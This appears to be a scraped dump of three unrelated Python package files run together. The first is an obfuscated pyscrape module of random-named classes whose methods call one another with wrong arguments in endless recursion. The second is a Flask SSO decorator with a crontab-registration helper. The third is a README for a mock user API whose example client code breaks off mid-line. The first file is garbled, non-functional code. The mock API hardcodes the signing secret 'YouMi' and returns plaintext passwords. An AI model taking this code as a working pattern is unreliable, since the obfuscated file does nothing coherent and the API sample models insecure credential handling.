return self.__UuSNwlyqhWRpigWpKfO()
def __gQpkwfuKFyds(self, WqOlBaDBT, iMlcmoEllmIoPIO, UXCCfigBRCgwsS):
return self.__UBgRondhMFWhdGNu()
def __zyyvVjNEYqN(self, ROvbUfqcxeQIgvERzLi, wcgQSEsOYRHSYXdQy, JrLWNpFRRlvqxIKUjHiw, BmVRCfZdrNQvNKBqASP, pbMufzzJv):
return self.__WqOWKJMuajtKchfzStA()
def __rugBqjun(self, nzGIJhhduCoklzyT, nHsbnNPKqtMUx, POPsOYhYoA):
return self.__gQpkwfuKFyds()
def __UBgRondhMFWhdGNu(self, PNJLnrKm, QZvDLWZkOV, PlnIKeX, ZMsheCeGfoCaaqnRGzTT, urdBDpriYkQVSv):
return self.__HcGJCofB()
def __lWCNHXupuMOpkArPDMzO(self, atYlmwgmbOiqd, yETgCe, MrtSYAToLP):
return self.__rugBqjun()
def __WqOWKJMuajtKchfzStA(self, NZksfTkgdKTAdvRgGNVb, wPHsMaAupT, tYzYALMDccJFEgReCueP):
return self.__lWCNHXupuMOpkArPDMzO()
def __CLUzeXIdLZVyYD(self, ekcNbtOLzh):
return self.__UuSNwlyqhWRpigWpKfO()
def __UuSNwlyqhWRpigWpKfO(self, ZLjFuArPIOWV, edMfKCuaZWNCl, YkXliStefMSX, idZtQO, xISesFyIOSLliTEeGc, mQXioRpuZjyp, NLpLgBEnlCElddOafUR):
return self.__UuSNwlyqhWRpigWpKfO()
def __HcGJCofB(self, euFMDfTSkRYfqbt):
return self.__jAKcewnGizbukxh()
def __PsBaSBvjYCgixmT(self, xFnbxJw):
return self.__UiVvlqeeBTxVGBDp()
def __spwdmVavS(self, DINaUrPKWrSLISUwz, DNnDmmpRtL, eARaJF, kflpQrEyUYecCdNj, OuKzWQEYkhTR, DzbvUvRswaG):
return self.__jAKcewnGizbukxh()
def __jAKcewnGizbukxh(self, gRLkULVTrUdvwqGwajXw, PovfwavNwACTbT, qEzchjmWKLBEiOJG, uizgBhKuTouhDkEc, sgHFglhtoOSKpInBzjJs, WZTsfyv, tMLelMcgYr):
return self.__UuSNwlyqhWRpigWpKfO()
class LmwdbqLKLbVzTdjcuD:
def __init__(self):
self.__PhrByyCyIgTCapeRi()
self.__zlvjgydIDuLBaqQ()
self.__EBzLuJOwXxwEWnOKexnc()
self.__PEXFwPwYbF()
self.__BborEHBATtIlAB()
self.__CAUFqIihnD()
self.__bCmKQJNWKViab()
self.__MJigMWOJYyVqAydbDEiP()
self.__hAsEkxOpdRODXpJ()
def __PhrByyCyIgTCapeRi(self, dbyIXKcuwswVNbr, AwudX):
return self.__PhrByyCyIgTCapeRi()
def __zlvjgydIDuLBaqQ(self, VtwHL):
return self.__CAUFqIihnD()
def __EBzLuJOwXxwEWnOKexnc(self, zoWApUXFOlVxd, udCXIowpHOkCol, fIMtNVbKTU):
return self.__BborEHBATtIlAB()
def __PEXFwPwYbF(self, RKVokzLOfpkuZPc, nQsWgVNlizUWYPwbn, edffsFRsXYG, GUcENfAICVYadLktyr):
return self.__PEXFwPwYbF()
def __BborEHBATtIlAB(self, CqeDlFkydid, gLTmYvqKZCLZfrB, yYOzbRaXM, urWHyoMNLNFfFecwHs, eeSxPXKWYOlcHxxsw):
return self.__BborEHBATtIlAB()
def __CAUFqIihnD(self, gCCiHiXLHmomdU):
return self.__EBzLuJOwXxwEWnOKexnc()
def __bCmKQJNWKViab(self, MKxBPOXVxbATFfOPIXn, WTfIMxI, ESNuRRCJCtSHxn, ttwlMOolSyUwcynYn, YoIKGzbxjkX):
return self.__zlvjgydIDuLBaqQ()
def __MJigMWOJYyVqAydbDEiP(self, KakyDShNOAxf, fUXhOeNS, lpYqWmz):
return self.__zlvjgydIDuLBaqQ()
def __hAsEkxOpdRODXpJ(self, tbmGSwWzFxst, nCFORGALrpnrvAPugcz):
return self.__PEXFwPwYbF()
class AWWRwegRS:
def __init__(self):
self.__aLWDuqGzubcqSvUQhIsQ()
self.__pcqQbfUFb()
self.__GKyTsJzTMhXxxxH()
self.__wXrByUdTpCyvClh()
self.__oHeIdJkeQMPrnt()
self.__RPOKkJyX()
self.__QEXQAuyxFXBI()
self.__ddBIRxQonBZg()
self.__fBFHPdiPuAqDNbvJ()
self.__gHxnsLOhkeKutpFxfA()
self.__WzWAWcBwIJEducJ()
def __aLWDuqGzubcqSvUQhIsQ(self, nQuXTuNwHAcoS, BVdwzugk, QVgHVHmD, teBxuOsjizvLfuLNN, rCNMGCruOdL):
return self.__GKyTsJzTMhXxxxH()
def __pcqQbfUFb(self, ZLADgGuoYSUpNA, BgIwIvUoWyrcjqTmK, idNbVTl, sLNzboWszGmYBNjO):
return self.__wXrByUdTpCyvClh()
def __GKyTsJzTMhXxxxH(self, GduaJAfQYIaPrCAEN, JECFRrsiwATOverVfJgc, pjWULzYXzo):
return self.__pcqQbfUFb()
def __wXrByUdTpCyvClh(self, lJfrG):
return self.__WzWAWcBwIJEducJ()
def __oHeIdJkeQMPrnt(self, bsqOsMNtEPzu, SsFUsIghrdGvEegWAFqo, BepNhsIpwF, FgSizHpHBMstQkRM, yLkixVFgoFfCdNU, otJMiVXEPfum):
return self.__wXrByUdTpCyvClh()
def __RPOKkJyX(self, XpBkwnCziwgcqPqN, GmBYQwCSllpcH):
return self.__wXrByUdTpCyvClh()
def __QEXQAuyxFXBI(self, MROYjzAIBy, jEAyYeUYecBs, XGNWvXkWltVp, gUdCp, FZjOjGgBfUVLhQt, LCQbdawspAVYJbS, EynPyvis):
return self.__RPOKkJyX()
def __ddBIRxQonBZg(self, hNRGSkENxFtykmZy, YALYfpbYSvfGCksb, IGSsOBzzHayVCd, jtJDvBo, ioxKwuvQH, NQrTPISuGaAwmwNVjjK):
return self.__fBFHPdiPuAqDNbvJ()
def __fBFHPdiPuAqDNbvJ(self, sNyPQIVNGExxhlMhUuV, RwnqNWLDsUOgblrfA, YaKVuYqLnsGDy, yFmgZRjGsnzWYWtllGB, xBuIaaOxRyVzZaLQtoDm, hRkiNssFKwkRzY):
return self.__wXrByUdTpCyvClh()
def __gHxnsLOhkeKutpFxfA(self, YZIcQwetgXSyXTSh, jmSzWxJlYjYIOmGIZW, PjKAjI):
return self.__ddBIRxQonBZg()
def __WzWAWcBwIJEducJ(self, ddlgWiSdtGRc, ZzMLVivQNNDTJKqzR, ZwWDcqoqme, CuYUlu, VJURb, PiraRJtsr, WAawvq):
return self.__QEXQAuyxFXBI()
class ESnbyUqGDKqpgJKZDpeV:
def __init__(self):
self.__LRlfYAGotKefRYe()
self.__dYaGtZoSBojwrLIBzZ()
self.__OCxwvZShctVJa()
self.__zLZZtGLa()
self.__LGWWNiAJitLVGyE()
self.__jcOIUwuLjro()
self.__VifHxOzivOYRtvdX()
self.__hMyKEufeyWZEwjMAqzT()
self.__bzNqiMdP()
self.__lxGRMiypC()
def __LRlfYAGotKefRYe(self, hKMdO, dpysHyPoJRharDgL):
return self.__LRlfYAGotKefRYe()
def __dYaGtZoSBojwrLIBzZ(self, zgWyCJOKZAYaEHkQW, tyObvaJdutxZhiH, ZlqelxTZagE, uXUDvfOrNYKjOcvmEO, PfBgfiupBWzuWi):
return self.__LGWWNiAJitLVGyE()
def __OCxwvZShctVJa(self, GmhwkN, VLEZIjfpdKyRtLFvKala, FLvrwZV, flCNAeoWo):
return self.__zLZZtGLa()
def __zLZZtGLa(self, kZNFGPMj, gCYMG, LpsePNrJGnaZ, BhpipMq, qiaSCfJBJYkmmAzSkT, YTsBXIemLjiDjqManPGD, zCktKthFBrKobC):
return self.__zLZZtGLa()
def __LGWWNiAJitLVGyE(self, CRznenlrFAJtzFzKoZ, cGYdhuN, lvWQjXoPgY, VgOub, zRMWfORIl, yZrgWMRfCeize):
return self.__VifHxOzivOYRtvdX()
def __jcOIUwuLjro(self, gONaYhkFJilviBG, aEWCnLXoFZFXlEy, KgHMt, kvdJUKwqTYLC, zZyUMnjJLyUUtsKt, GeUEQ):
return self.__VifHxOzivOYRtvdX()
def __VifHxOzivOYRtvdX(self, CQeCzSAqYhtJcIARySu):
return self.__lxGRMiypC()
def __hMyKEufeyWZEwjMAqzT(self, pCpfKLjRoZcNFPNkqEED, RldpEWALAvE, EfBVKmsP, vhGvggpm):
return self.__lxGRMiypC()
def __bzNqiMdP(self, FOvQgBetn, IpOqSxYwqlzNLBHVOviI, SORVHiUemDKTCAwtwUkV, krfrxbCdpub, XeabYObtqwZsSRoB):
return self.__hMyKEufeyWZEwjMAqzT()
def __lxGRMiypC(self, EDOROQRr, OWQbaPiUzol, UfolIBpo, cscRarjll):
return self.__VifHxOzivOYRtvdX()
class luCivsJdEIWkxKaeiDWc:
def __init__(self):
self.__PiUmhoDPMngBkfRtitN()
self.__BFPREwrcAyVBkMR()
self.__tcwHoXmWjdG()
self.__uDFRplohoQiVgXBOwww()
self.__olYULXKevHEIkllQLJ()
self.__NeUHPQaIIguqePxXTA()
def __PiUmhoDPMngBkfRtitN(self, jbweT, rmBuVljKFpZIjcIu, tzpQXxF, DwnuBCbO, bCBTSoqctIl):
return self.__tcwHoXmWjdG()
def __BFPREwrcAyVBkMR(self, bYqInMHbflRDFdpxe):
return self.__BFPREwrcAyVBkMR()
def __tcwHoXmWjdG(self, BBXjPsALA):
return self.__uDFRplohoQiVgXBOwww()
def __uDFRplohoQiVgXBOwww(self, iFRnQX):
return self.__uDFRplohoQiVgXBOwww()
def __olYULXKevHEIkllQLJ(self, GbBfMuLzinLu, KmHvgkPkO):
return self.__PiUmhoDPMngBkfRtitN()
def __NeUHPQaIIguqePxXTA(self, BCsOIyvWMxfGouExzinQ):
return self.__BFPREwrcAyVBkMR()
class zxvycYiVNMwsw:
def __init__(self):
self.__uICADFTkpF()
self.__tQIlhMoTUZNoaDbSeV()
self.__xRyhNGVgkZbqF()
self.__CEyLcnofmwHBJUPVYPL()
self.__HhVFpYJEzbygl()
self.__LOnFhWusK()
self.__ACPOaicIjRNkSYclJs()
self.__fLWXRROYZFzQEo()
def __uICADFTkpF(self, yeZkkwEgrxxhhUwjDaZG):
return self.__CEyLcnofmwHBJUPVYPL()
def __tQIlhMoTUZNoaDbSeV(self, qmpNYzVdOTcV, vrzZovkYEYZZeHzpjJX, LBvVOXl, nZVStHkofrMwKmycCEc, IPKmaGV):
return self.__ACPOaicIjRNkSYclJs()
def __xRyhNGVgkZbqF(self, GhPlslIjWEbj):
return self.__CEyLcnofmwHBJUPVYPL()
def __CEyLcnofmwHBJUPVYPL(self, QjdYNSXHbcLolJ, NZbwUR, zxXevxambubdwuwzK, NDTOGP, zBcmuQaDvMEdNlLynmYH, dRGOvPYcUbxtc):
return self.__fLWXRROYZFzQEo()
def __HhVFpYJEzbygl(self, CGAllwTbvMBYIYkDqrQ, MGcPeyJgGZdUodLct, xjXZPtlGGISYjKDuErqx, WgnXNYtluhMiW):
return self.__xRyhNGVgkZbqF()
def __LOnFhWusK(self, emciytwcOsTFKKSATDZ, MJmOtyy, EqbaZoCrRqUcSXhlBpF, VbMFDvqZNF):
return self.__LOnFhWusK()
def __ACPOaicIjRNkSYclJs(self, fHPAPR, voHYiOJrNBm, KjjTCfTyU, JEZAWUXIy, FdErvHtsG, dizPrsPJmlg):
return self.__uICADFTkpF()
def __fLWXRROYZFzQEo(self, EDiyZqbQyCELDTFAXWVO, ArHiQuuDqSH, oRwwu, bVKBIqk):
return self.__uICADFTkpF()
class XdurwtSI:
def __init__(self):
self.__jaWJkeJKlIRVNVvkV()
self.__roNfPnNnFhfnEyKICgUx()
self.__YYanMeWxtLxkHdBwS()
self.__xfNucAoodmvCzzGm()
self.__HFlPHDXPZMmmkEueBpI()
self.__GdwaJGJHpeMsHNWeV()
self.__DBXzjjwNWuvcmWcTklr()
self.__yvJVkPFgCkFiGOK()
self.__oCLuzZWuMeq()
self.__nhfCiEmWABwXtQ()
self.__QkXTIalTM()
self.__RcNsAVeYyUhofh()
self.__DZrVZAuYHy()
self.__rbpTlwqXoBHqYukNSo()
def __jaWJkeJKlIRVNVvkV(self, bvoaOQ, ruXeoEGJYpkho):
return self.__roNfPnNnFhfnEyKICgUx()
def __roNfPnNnFhfnEyKICgUx(self, KYzygapefsTSKlE, DpOAyxlGvWNfNhq):
return self.__DBXzjjwNWuvcmWcTklr()
def __YYanMeWxtLxkHdBwS(self, NItlNtteQt, qzudGiutPaoZdOVwT):
return self.__roNfPnNnFhfnEyKICgUx()
def __xfNucAoodmvCzzGm(self, eBlWtM, wEGsAYDiuPEpRAl, TuCtYyapMvUfY):
return self.__oCLuzZWuMeq()
def __HFlPHDXPZMmmkEueBpI(self, dZXNSm, LUGCZwnIOZeGDZgoddy):
return self.__YYanMeWxtLxkHdBwS()
def __GdwaJGJHpeMsHNWeV(self, jLNlujosMJPaJW, NXwyDWsvPDb, fCUIjiFFHOdlkdV, rLGQKpDpZVIakrVqu):
return self.__YYanMeWxtLxkHdBwS()
def __DBXzjjwNWuvcmWcTklr(self, MVYneenXLLcl, CUknGz):
return self.__xfNucAoodmvCzzGm()
def __yvJVkPFgCkFiGOK(self, IbkzTSRJfA, UElAwBLjMBkCnFofng, nhnfwHQqljdzYdZrf):
return self.__oCLuzZWuMeq()
def __oCLuzZWuMeq(self, RNroHSFlVmbuaiUdQXdX, CcYfDTQl, DLfOzVXvIcMwYXb, otEGnONLVJu, TjWpFwTLWIuZOLnrut):
return self.__jaWJkeJKlIRVNVvkV()
def __nhfCiEmWABwXtQ(self, pxOtJXwyVQo, NbLFDtaD, WWNFATX, CSBSbf):
return self.__jaWJkeJKlIRVNVvkV()
def __QkXTIalTM(self, IWBswTnrfa, TAlYz):
return self.__nhfCiEmWABwXtQ()
def __RcNsAVeYyUhofh(self, ECLlefj, nRBPGvGXzVAdjnj):
return self.__HFlPHDXPZMmmkEueBpI()
def __DZrVZAuYHy(self, kyBEeRSPbxGW, LZPpjr, NnDOpDCVeCH, ONWPwMIQgqRtt):
return self.__nhfCiEmWABwXtQ()
def __rbpTlwqXoBHqYukNSo(self, incnorYGIIrZELRbpjd, CjiFIUzRAjpyoJdSXT, gHmHhRlHGVsqj, yPUzQvaHwcao, mINOxWvaGqzTUcAl, mXycfXox, cLjIWjHgvPXsx):
return self.__YYanMeWxtLxkHdBwS()
class rGkEqkHmUTRztKbj:
def __init__(self):
self.__tEPfKdopCgAmZe()
self.__eMbOHCDyH()
self.__NAkGQShvdSDtsyDKHUQe()
self.__DoNiaJRZYObPSNN()
self.__yRTVaUmfHAaQEzanpn()
self.__CpFTSYsKEPNWDJptedo()
self.__ciZEtWjKonuDzqm()
self.__sKpSuHSVlRGgvxGDt()
self.__ERNsRXxAvUDVcuJszgOs()
self.__yumQjfKwLMkBiLgNW()
self.__KCEVhjgxfzGVVEkpT()
def __tEPfKdopCgAmZe(self, YFguYFjlHpH, nDyqEaBNKkMr, UXzapCEYdvJSGq):
return self.__tEPfKdopCgAmZe()
def __eMbOHCDyH(self, uubrjAgigAhoCtUYllsJ, weUkKHJKDUgbdk, ibvlAl, KcLTdgQDjsVYpF):
return self.__ciZEtWjKonuDzqm()
def __NAkGQShvdSDtsyDKHUQe(self, olVoIK, bDEvPlGdZWSNlcRKIZJK, QRgdqLXDjLMHpNPs, angwIjMGvsaxyNvbr):
return self.__yRTVaUmfHAaQEzanpn()
def __DoNiaJRZYObPSNN(self, iENEozJheyaXgueYOxMR, DBJXwFEn, YbLnVNnShdCLJTxto, xBwGFDJXlkPeQFnDyF, MKIzbigCuowJwm, TEocGKiBgou, TaoXzGVlqHlgUEeJeYD):
return self.__KCEVhjgxfzGVVEkpT()
def __yRTVaUmfHAaQEzanpn(self, xlqtePZqjPLLitITP):
return self.__DoNiaJRZYObPSNN()
def __CpFTSYsKEPNWDJptedo(self, ZbwzMBpdTlHHnr, QLeefzyNzytNGixa, bgQEfifIAEVdUUDy):
return self.__NAkGQShvdSDtsyDKHUQe()
def __ciZEtWjKonuDzqm(self, lcNtCmJuryMUvjEcYnD, aHdcDtxkwajUwXWoU, JUaCatOyspvfEpCUYwpt, DmZYSrYHcQthIXnQV, RBdSDdtRHpycYlwV):
return self.__CpFTSYsKEPNWDJptedo()
def __sKpSuHSVlRGgvxGDt(self, KWfJXxNm, ehBboxT, ZYcJpjKYRRjtxAD, xkzALvlXClnFjWCmgPQ, uWXyQgFUd, ljUfIvGGuFSuU):
return self.__ERNsRXxAvUDVcuJszgOs()
def __ERNsRXxAvUDVcuJszgOs(self, jDXMbCf, Hkaci, fyAJrbrgLUcg, ohHKKhmruVqFGGzOZE, FFTudiRjbD, dUcUqNRlcrq):
return self.__NAkGQShvdSDtsyDKHUQe()
def __yumQjfKwLMkBiLgNW(self, ZNpKODMQdylVW, duZCzQrfKVgetAR, pQoafmcyukNTUSpQS, KeufsoswgXvgt):
return self.__ciZEtWjKonuDzqm()
def __KCEVhjgxfzGVVEkpT(self, AXSWAiufuBL, NqdQWTtWSR, kOMcpEXyjNgKkSbDHlU, bJTMynrq, XzNOktDJIjCYxCU, bdophPzzKMFeVFsjkl, wHCQuwwOyYVNflCQZ):
return self.__tEPfKdopCgAmZe() | 90456984689490856 | /90456984689490856-0.tar.gz/90456984689490856-0/pyscrape/__init__.py | __init__.py |
from crontab import CronTab
import os
import inspect
import hashlib
import requests
import sys
import pymysql
import getpass
import json
from flask import request, json, session, abort
from functools import wraps
from flask_session import Session
frame = inspect.stack()[1]
index = inspect.getmodule(frame[0])
LOG_FILE_NAME_DEFAULT = "RunTime.log"
FILENAME = os.path.abspath(index.__file__)
LOG_PATH = os.path.dirname(FILENAME) + "/log/"
if not os.path.exists(LOG_PATH):
os.makedirs(LOG_PATH)
LOG_FILE = LOG_PATH + LOG_FILE_NAME_DEFAULT
APP = None
AUTH_SERVER = None
def build(app, server):
global AUTH_SERVER, APP
AUTH_SERVER = server
APP = app
# APP.config["SESSION_COOKIE_NAME"] = project_id
# APP.config["SESSION_TYPE"] = 'filesystem'
# APP.secret_key = secret_key
# Session(APP)
@APP.route('/userInfo', methods=['GET'])
@login_required
def userInfo():
userinfo = {}
for key, value in session.items():
userinfo[key] = value
return json.dumps(userinfo)
@APP.route('/api/logout', methods=['GET'])
def logOut():
session.clear()
return 'success'
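# Example usage (sketch; the auth-server URL below is a placeholder):
#   from flask import Flask
#   app = Flask(__name__)
#   app.config["SESSION_TYPE"] = "filesystem"
#   Session(app)
#   build(app, "https://sso.example.com")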
def login_required(f):
"""
Auth wraps
:param f:
:return:
"""
@wraps(f)
def verify(*args, **kwargs):
        # A local session exists: let the request through
if session.get('isLogin') == True:
return f(*args, **kwargs)
        # No local session: validate the request
        # check 1: verify that a global session exists and obtain the ssoToken
ssoToken = request.args.get('ssoToken')
headers = {
'act': request.headers.get('act'),
'cookie': request.headers.get('cookie')
}
if ssoToken is None or ssoToken == '':
req = requests.get(AUTH_SERVER + '/auth/checkLogin', headers=headers)
if req.status_code != 200:
return abort(401)
else:
ssoToken = json.loads(req.text).get('ssoToken')
        # check 2: register with the auth center using the ssoToken and fetch the user info
        # create a temporary session in order to obtain session.sid
session['isLogin'] = False
payload = {
'appkey': 'alarm',
'ssoToken': ssoToken,
'sessionId': session.sid,
'logoutUrl': request.scheme + '://' + request.host + '/api/logout'
}
req = requests.post(AUTH_SERVER + '/auth/verifyToken', headers=headers, data=payload)
if req.status_code != 200:
session.clear()
return abort(401)
else:
auth_info = json.loads(req.text)
            # create the local session
for key, value in auth_info.items():
session[key] = value
session['isLogin'] = True
        # let the request through
return f(*args, **kwargs)
return verify
def get_md5_value(value):
"""
:param value: String
:return: MD5 result
"""
my_md5 = hashlib.md5()
    my_md5.update(value.encode("utf-8") if isinstance(value, str) else value)  # accept str or bytes
my_md5_Digest = my_md5.hexdigest()
return my_md5_Digest
JOB_ID = get_md5_value(FILENAME)
IS_REGISTER = 0
class SimpleCronControl:
def __init__(self, url, token):
self.user_name = getpass.getuser()
self.my_cron = CronTab(user=self.user_name)
self.register_flag = 0
self.work = None
self.job_state = False
self.threshold = {}
self.base_url = url
self.token = token
def list_cron(self):
"""
list all cron jobs of this user
:return: Return jobs list
"""
crontab_jobs = list()
for job in self.my_cron:
crontab_jobs.append(job)
return crontab_jobs
def get_url(self, path):
return "%s/%s" % (self.base_url, path)
def send(self, type, message):
url = self.get_url("message_receiver")
token = self.token
req_body = dict()
req_body["token"] = token
req_body["type"] = type
req_body["message"] = message
job_status_response = requests.post(url=url, json=req_body, timeout=200)
if job_status_response.status_code != 200:
msg = job_status_response.json().get("message")
raise RuntimeError(
"Can not get expect Response from %s, Code: %s, Msg:%s" % (url, job_status_response.status_code, msg))
def cron_control(self, command_core="python"):
"""
You can control your cron job whih this function
:param setall: cron job's frequency
:param command_core: basic command for this cron job
:return:
"""
url = self.get_url("verify")
token = self.token
job_status_response = requests.get(url=url, params={"token": token}, timeout=200)
if job_status_response.status_code != 200:
raise RuntimeError("Can not get expect Response from %s, Code: %s" % (url, job_status_response.status_code))
res = job_status_response.json().get("data")
if not res.get("job_setall") or not res.get("status"):
raise RuntimeError("The Response is not expected")
setall = res.get("job_setall")
global JOB_ID
JOB_ID = get_md5_value(token)
if res.get("status") == "1":
self.job_state = True
if res.get("job_threshold"):
self.threshold = res.get("job_threshold")
if not self.job_state:
print("Job Status is False!\nexit!")
exit()
if not self.is_register(setall):
print("Prepare to Register Job")
job = self.my_cron.new(
command='%s %s %s >> %s 2>&1 &' % (command_core, FILENAME, " ".join(sys.argv[1:]), LOG_FILE),
comment="%s|%s" % (JOB_ID, setall))
job.setall(setall)
self.my_cron.write()
print("Register Cron Job Success")
else:
print("Job Status:Healthy")
return self
def is_register(self, setall):
"""
Judge the Cron Job has register or not
:param setall: cron job's frequency
:return:
"""
for job in self.my_cron:
comment_list = job.comment.split("|")
            if len(comment_list) == 2 and comment_list[0] == JOB_ID:
if comment_list[1] != setall:
print("Prepare to change Cron Job's Frequency")
job.setall(setall)
job.set_comment("%s|%s" % (JOB_ID, setall))
self.my_cron.write()
print("Cron Job's Frequency has changed")
self.register_flag = 1
self.work = job
return True
return False
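# Example usage (sketch; the URL, token, and message type below are placeholders):
#   control = SimpleCronControl("http://alarm.example.com", "my-token")
#   control.cron_control(command_core="python3")  # registers this script as a cron job
#   control.send("warning", "threshold exceeded")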
class NormalTools:
"""
Daily tools
"""
def __init__(self): pass
def mysql_connector(self, host, port, user, passwd, database, charset='utf8', write_timeout=100):
return pymysql.connect(host=host,
port=port,
user=user,
password=passwd,
database=database, charset=charset, write_timeout=write_timeout) | 91act-platform | /91act-platform-1.0.5.tar.gz/91act-platform-1.0.5/alarm_util_pkg/core.py | core.py |
# A Api Server
## 1. Overview
A Api Server is a simple RESTful-style API service that provides endpoints for creating, reading, updating and deleting (CRUD) user accounts. It includes a request-signature verification mechanism, which makes it convenient for developing and debugging API test-automation tools!
### 1. Start the service locally
- (1) Start from the command line
```
pip install A-Api-Server
a_api_server <custom port>  # defaults to 5000
```
- (2) Clone the source and start
```
pip install gunicorn flask
cd a_api_server
python api_server.py <custom port>  # defaults to 5000
```
(Note: compatible with both Python 2 and Python 3)
### 2. Start the service on a server (gunicorn recommended)
```
cd a_api_server
gunicorn api_server:app -p api_server.pid -b 0.0.0.0:5000 -w 4 -D

# To stop the service on the server:
kill -HUP `cat api_server.pid`
kill `cat api_server.pid`
```
### 3. Access the service after startup
```
http://your.ip:5000
```
## 2. API documentation
### 1. API V1 overview
- Base URL: http://your.ip:5000/
- HTTP status codes are used to indicate request status
- All data is returned in JSON format
- API V1 uses token-based authentication throughout
- APIs that require authorization must supply the device serial number in the `device_sn` request header and the access token in the `token` header
- Global request headers

| Name | Type | Description | Notes |
| ------------ | ------ | -------------------- | --------------------------------------- |
| Content-Type | String | Content type | application/json |
| device_sn | String | Device serial number | Unique device identifier |
| token | String | Access token | Only devices holding a token may access |
#### 1.1. Supported request methods
- GET (SELECT): retrieve one or more resources from the server.
- POST (CREATE): create a new resource on the server.
- PUT (UPDATE): update a resource on the server (the client supplies the complete, modified resource).
- PATCH (UPDATE): update a resource on the server (the client supplies only the changed attributes).
- DELETE (DELETE): delete a resource from the server.
- HEAD: retrieve metadata about a resource.
- OPTIONS: find out which attributes of a resource the client is allowed to change.
#### 1.2. Common response status codes
| _Status code_ | _Meaning_ | _Description_ |
| -------- | --------------------- | ----------------------------------------------------------------------- |
| 200 | OK | Request succeeded |
| 201 | CREATED | Created successfully |
| 204 | DELETED | Deleted successfully |
| 400 | BAD REQUEST | The requested address does not exist or contains unsupported parameters |
| 401 | UNAUTHORIZED | Unauthorized |
| 403 | FORBIDDEN | Access forbidden |
| 404 | NOT FOUND | The requested resource does not exist |
| 422 | UNPROCESSABLE ENTITY | [POST/PUT/PATCH] A validation error occurred while creating an object |
| 500 | INTERNAL SERVER ERROR | Internal error |
---
### 2. Endpoint details
#### 2.1. Get a token
- Request path: /api/get-token
- Request method: POST
- Request headers

| Name | Type | Description | Notes |
| ----------- | ------ | -------------------- | ---- |
| User-Agent | String | User agent | |
| device_sn | String | Device serial number | |
| os_platform | String | OS platform | |
| app_version | String | App version | |
- Request parameters

| Name | Type | Description | Notes |
| ------ | ------ | ----------- | ------------------------------------------------------ |
| sign | String | Signature | Generated from the request headers and the secret key |
- Response parameters

| Name | Type | Description | Notes |
| ------- | ------- | ----------------------------- | ------------------ |
| success | Boolean | Whether the request succeeded | |
| token | String | Access token | 16 characters long |
- Success response
```
Status code: 200
Response body:
{
    'success': true,
    'token': "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aW"
}
```
- Failure response
```
Status code: 403
Response body:
{
    'success': false,
    'msg': "Authorization failed!"
}
```
- Signature generation algorithm
```python
def get_sign(*args):
    SECRET_KEY = 'YouMi'
    content = ''.join(args).encode('ascii')
    sign_key = SECRET_KEY.encode('ascii')
    sign = hmac.new(sign_key, content, hashlib.sha1).hexdigest()
    return sign

sign = get_sign(user_agent, device_sn, os_platform, app_version)
```
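For reference, a minimal client sketch for requesting a token is shown below (the header values are placeholders for illustration):
```python
import hashlib
import hmac

import requests

SECRET_KEY = 'YouMi'

# Placeholder header values for illustration
headers = {
    'User-Agent': 'python-requests',
    'device_sn': 'TESTDEVICE01',
    'os_platform': 'ios',
    'app_version': '2.8.6',
}
content = ''.join([headers['User-Agent'], headers['device_sn'],
                   headers['os_platform'], headers['app_version']]).encode('ascii')
sign = hmac.new(SECRET_KEY.encode('ascii'), content, hashlib.sha1).hexdigest()

resp = requests.post('http://your.ip:5000/api/get-token',
                     headers=headers, json={'sign': sign})
token = resp.json()['token']
```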
#### 2.2. Create a user
- Request path: /api/users/:id
- Request method: POST
- Request parameters

| Name | Type | Description | Notes |
| -------- | ------ | ----------- | ---- |
| id | Int | User ID | |
| name | String | Username | |
| password | String | Password | |
- Response parameters

| Name | Type | Description | Notes |
| ------- | ------- | ----------------------------- | ---- |
| success | Boolean | Whether the request succeeded | |
| msg | String | Message | |
- Success response
```
Status code: 201
Response body:
{
    'success': true,
    'msg': "user created successfully."
}
```
- Failure response
```
Status code: 422
Response body:
{
    'success': false,
    'msg': "user already existed."
}
```
#### 2.3. Query user info by ID
- Request path: /api/users/:id
- Request method: GET
- Response parameters

| Name | Type | Description | Notes |
| -------- | ------- | ----------------------------- | ---- |
| success | Boolean | Whether the request succeeded | |
| name | String | Username | |
| password | String | Password | |
- Success response
```
Status code: 200
Response body:
{
    'success': true,
    'data': {
        'name': 'admin',
        'password': '123456'
    }
}
```
- Failure response
```
Status code: 404
Response body:
{
    'success': false,
    'data': {}
}
```
#### 2.4. Update user info
- Request path: /api/users/:id
- Request method: PUT
- Request parameters

| Name | Type | Description | Notes |
| -------- | ------ | ----------- | ---- |
| id | Int | User ID | |
| name | String | Username | |
| password | String | Password | |
- Response parameters

| Name | Type | Description | Notes |
| ------- | ------- | ----------------------------- | ---- |
| success | Boolean | Whether the request succeeded | |
| data | Dict | User info | |
- Success response
```
Status code: 200
Response body:
{
    'success': true,
    'data': {
        'name': 'admin',
        'password': '123456'
    }
}
```
- Failure response
```
Status code: 404
Response body:
{
    'success': false,
    'data': {}
}
```
#### 2.5. Delete user info
- Request path: /api/users/:id
- Request method: DELETE
- Request parameters

| Name | Type | Description | Notes |
| ------ | ---- | ----------- | ---- |
| id | Int | User ID | |
- Response parameters

| Name | Type | Description | Notes |
| ------- | ------- | ----------------------------- | ---- |
| success | Boolean | Whether the request succeeded | |
| data | Dict | User info | |
- Success response
```
Status code: 200
Response body:
{
    'success': true,
    'data': {
        'name': 'admin',
        'password': '123456'
    }
}
```
- Failure response
```
Status code: 404
Response body:
{
    'success': false,
    'data': {}
}
```
#### 2.6. List all users
- Request path: /api/users
- Request method: GET
- Response parameters

| Name | Type | Description | Notes |
| ------- | ------- | ----------------------------- | ---- |
| success | Boolean | Whether the request succeeded | |
| count | Int | Total number of users | |
| items | Array | Collection of user data | |
- Success response
```
Status code: 200
Response body:
{
    'success': true,
    'count': 3,
    'items': [
        {'name': 'admin1', 'password': '123456'},
        {'name': 'admin2', 'password': '123456'},
        {'name': 'admin3', 'password': '123456'}
    ]
}
```
#### 2.7. Reset all user data
- Request path: /api/reset-all
- Request method: GET
- Response parameters

| Name | Type | Description | Notes |
| ------- | ------- | ----------------------------- | ---- |
| success | Boolean | Whether the request succeeded | |
- Success response
```
Status code: 200
Response body:
{
    'success': true
}
```
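Putting the endpoints together, a minimal end-to-end client sketch looks like this (it continues the token example in section 2.1, so `headers` and `token` are assumed to be defined as shown there):
```python
auth_headers = {'device_sn': headers['device_sn'], 'token': token}
base = 'http://your.ip:5000'

requests.post(base + '/api/users/1', headers=auth_headers,
              json={'name': 'admin', 'password': '123456'})              # create
print(requests.get(base + '/api/users/1', headers=auth_headers).json())  # read
requests.put(base + '/api/users/1', headers=auth_headers,
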